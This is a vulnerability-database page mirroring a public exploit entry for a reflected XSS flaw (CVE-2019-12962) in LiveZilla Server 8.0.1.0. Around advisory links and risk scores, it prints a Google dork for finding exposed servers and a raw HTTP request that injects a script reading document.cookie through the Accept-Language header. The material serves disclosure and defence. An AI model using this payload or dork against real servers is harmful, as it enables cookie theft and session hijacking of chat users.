Lucene search
K

LiveZilla Server 8.0.1.0 - (Accept-Language) Reflected XSS Vulnerability

🗓️ 19 Mar 2021 00:00:00Reported by zdtType 
zdt
 zdt
🔗 0day.today👁 65 Views

LiveZilla Server 8.0.1.0 Accept-Language Reflected XSS Vulnerabilit

Related
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2019-12962
15 Jan 202409:19
circl
CNVD
LiveZilla Server Cross-Site Scripting Vulnerability (CNVD-2019-21246)
26 Jun 201900:00
cnvd
CVE
CVE-2019-12962
25 Jun 201912:55
cve
Cvelist
CVE-2019-12962
25 Jun 201912:55
cvelist
Exploit DB
LiveZilla Server 8.0.1.0 - 'Accept-Language' Reflected XSS
19 Mar 202100:00
exploitdb
EUVD
EUVD-2019-4537
7 Oct 202500:30
euvd
Nuclei
LiveZilla Server 8.0.1.0 - Cross-Site Scripting
4 Jul 202603:00
nuclei
NVD
CVE-2019-12962
25 Jun 201913:15
nvd
OpenVAS
LiveZilla < 8.0.1.2 Multiple XSS Vulnerabilities
2 Jul 201900:00
openvas
OSV
CVE-2019-12962
25 Jun 201913:15
osv
Rows per page
# Exploit Title: LiveZilla Server 8.0.1.0 - 'Accept-Language' Reflected XSS
# Google Dork: inurl: inurl:/mobile/index.php intitle:LiveZilla
# Exploit Author: Clément Cruchet
# Vendor Homepage: https://www.livezilla.net
# Software Link: https://www.livezilla.net/downloads/en/
# Version: LiveZilla Server 8.0.1.0 and before
# Tested on: Windows/Linux
# CVE : CVE-2019-12962

GET /mobile/index.php HTTP/1.1
Host: chat.website.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:86.0) Gecko/20100101 Firefox/86.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: ';alert(document.cookie)//
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1

#  0day.today [2021-09-29]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

19 Mar 2021 00:00Current
0.5Low risk
Vulners AI Score0.5
CVSS 24.3
CVSS 3.16.1
EPSS0.09052
65